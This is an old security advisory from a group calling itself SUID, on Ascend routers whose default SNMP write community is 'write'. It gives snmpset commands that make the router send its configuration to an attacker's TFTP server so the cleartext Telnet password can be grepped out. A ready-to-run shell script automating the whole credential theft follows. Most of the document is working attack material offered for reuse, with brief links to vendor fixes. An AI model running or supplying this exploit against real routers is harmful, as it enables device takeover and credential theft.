SUID Advisory #2 - Exploit for ascend router bugs as per NAI advisory.
suid@suid.kg - exploit for ascend router bugs as per nai advisory:
http://www.nai.com/nai_labs/asp_set/advisory/26_ascendrouter_adv.asp
Summary:
Ascend routers running version 5 of the Ascend OS (TAOS) ship with SNMP write access enabled by default, using the
default write community name "write".
Ascend Pipeline and MAX series routers/access servers have been vulnerable to this attack for a long time. Although the
issue is widely known and a fix exists, many boxes are still vulnerable to it.
ADM seem to have an exploit for this already, although I do not know if they have published it. See the ADMsnmp scanner
for SNMP scanning help.
I am writing this up because I had the need to use it one day on a client penetration test. I may need to refer to it
again some day. As may you.
Exploit Information:
For this exploit to work, the router's write community must be enabled and set to "write".
You will need something like the UCD-SNMP command-line tools to set the following object IDs (all from the Ascend
enterprise MIB, enterprise number 529):
sysConfigTftpHostAddr (1.3.6.1.4.1.529.5.3.0) Type = IP Address
sysConfigTftpFilename (1.3.6.1.4.1.529.5.4.0) Type = String
sysConfigTftpCmd (1.3.6.1.4.1.529.5.1.1.0) Type = Integer (1 = Save)
Now set up a TFTP server somewhere. Make sure the router you are targeting can write a file there: many classic TFTP
daemons only accept a write if the target file already exists and is world-writable (or the daemon is started with an
option that allows creating new files, such as tftpd-hpa's -c), so create the file beforehand if in doubt.
Set the sysConfigTftpHostAddr OID to the IP address of your TFTP server:
$ snmpset <router> write .1.3.6.1.4.1.529.5.3.0 a "<ip of your TFTP server>"
Set the sysConfigTftpFilename OID to a filename writable on your TFTP server.
$ snmpset <router> write .1.3.6.1.4.1.529.5.4.0 s "<filename>"
With the host address and filename in place, set the sysConfigTftpCmd OID on the router to 1 (Save):
$ snmpset <router> write .1.3.6.1.4.1.529.5.1.1.0 i 1
The router will now save its configuration file to your TFTP server. Once the file has arrived, grep it for "Telnet PW".
You now have the router's Telnet password in cleartext.
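The procedure above, wrapped into a small script. This is an added example and not part of the original advisory or
of any ADM tool; it assumes the ucd-snmp style syntax "snmpset <host> <community> <oid> <type> <value>" used in the
advisory, a TFTP daemon already serving the directory given as the TFTP root, and that the saved config stores the
password as a "Telnet PW=<value>" line (the advisory only says to grep for "Telnet PW", so the exact line layout is an
assumption). The SNMPSET variable and the fake_snmpset idea exist only so the logic can be dry-run without a router.

```shell
#!/bin/sh
# Added example (not the advisory's own code). Assumes ucd-snmp/net-snmp
# snmpset syntax: snmpset <host> <community> <oid> <type> <value>.

# Object IDs from the advisory (ascend.mib, enterprise 529).
OID_TFTP_HOST='.1.3.6.1.4.1.529.5.3.0'   # sysConfigTftpHostAddr, IpAddress
OID_TFTP_FILE='.1.3.6.1.4.1.529.5.4.0'   # sysConfigTftpFilename, OctetString
OID_TFTP_CMD='.1.3.6.1.4.1.529.5.1.1.0'  # sysConfigTftpCmd, Integer; 1 = save

# The snmpset binary; override (e.g. with a shell function) for a dry run.
SNMPSET="${SNMPSET:-snmpset}"

# ascend_save_config ROUTER COMMUNITY TFTP_HOST FILENAME
# Issues the three sets in the order the router needs them: destination
# host and filename first, then the save command. Stops at the first failure.
ascend_save_config() {
    router=$1; community=$2; tftp_host=$3; filename=$4
    "$SNMPSET" "$router" "$community" "$OID_TFTP_HOST" a "$tftp_host" &&
    "$SNMPSET" "$router" "$community" "$OID_TFTP_FILE" s "$filename" &&
    "$SNMPSET" "$router" "$community" "$OID_TFTP_CMD" i 1
}

# prepare_tftp_target TFTPROOT FILENAME
# Classic tftpd only overwrites files that already exist and are
# world-writable; create such a file so the router's write succeeds.
prepare_tftp_target() {
    touch "$1/$2" && chmod 666 "$1/$2"
}

# wait_for_file PATH TIMEOUT_SECS
# Returns 0 as soon as the file is non-empty, 1 if the timeout expires.
wait_for_file() {
    i=0
    while [ "$i" -lt "$2" ]; do
        [ -s "$1" ] && return 0
        sleep 1
        i=$((i + 1))
    done
    return 1
}

# extract_telnet_pw CONFIGFILE
# Prints the value of the first "Telnet PW=<value>" line in the saved config
# (assumed key=value layout; the advisory only says to grep for "Telnet PW").
extract_telnet_pw() {
    grep 'Telnet PW=' "$1" | head -n 1 | sed 's/.*Telnet PW=//'
}

# Usage: sh ascend_dump.sh <router> <community> <tftp-host> <tftp-root> <filename>
# Only runs when all five arguments are given, so sourcing the file is harmless.
if [ "$#" -eq 5 ]; then
    prepare_tftp_target "$4" "$5" || exit 1
    ascend_save_config "$1" "$2" "$3" "$5" || exit 1
    wait_for_file "$4/$5" 30 || { echo "no config received from $1" >&2; exit 1; }
    echo "Telnet PW: $(extract_telnet_pw "$4/$5")"
fi
```

The TFTP root must be the directory the daemon actually serves, and the daemon must be reachable from the router
(not just from your workstation); a silent timeout in wait_for_file almost always means the router could not write
the file rather than that the SNMP sets failed, since snmpset reports those errors itself.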
Notes:
- All of this information was taken from ascend.mib, available from ftp.ascend.com.
- This problem has been known about since March 1998.
- The Ascend web site has information on what to do if your router is vulnerable to this at:
http://www.ascend.com/2694.html
Links:
- Ascend http://www.ascend.com/, http://www.ascend.com/2694.html
- NAI http://www.nai.com/, http://www.nai.com/nai_labs/asp_set/advisory/26_ascendrouter_adv.asp
- ADM ftp://adm.isp.at/pub/ADM/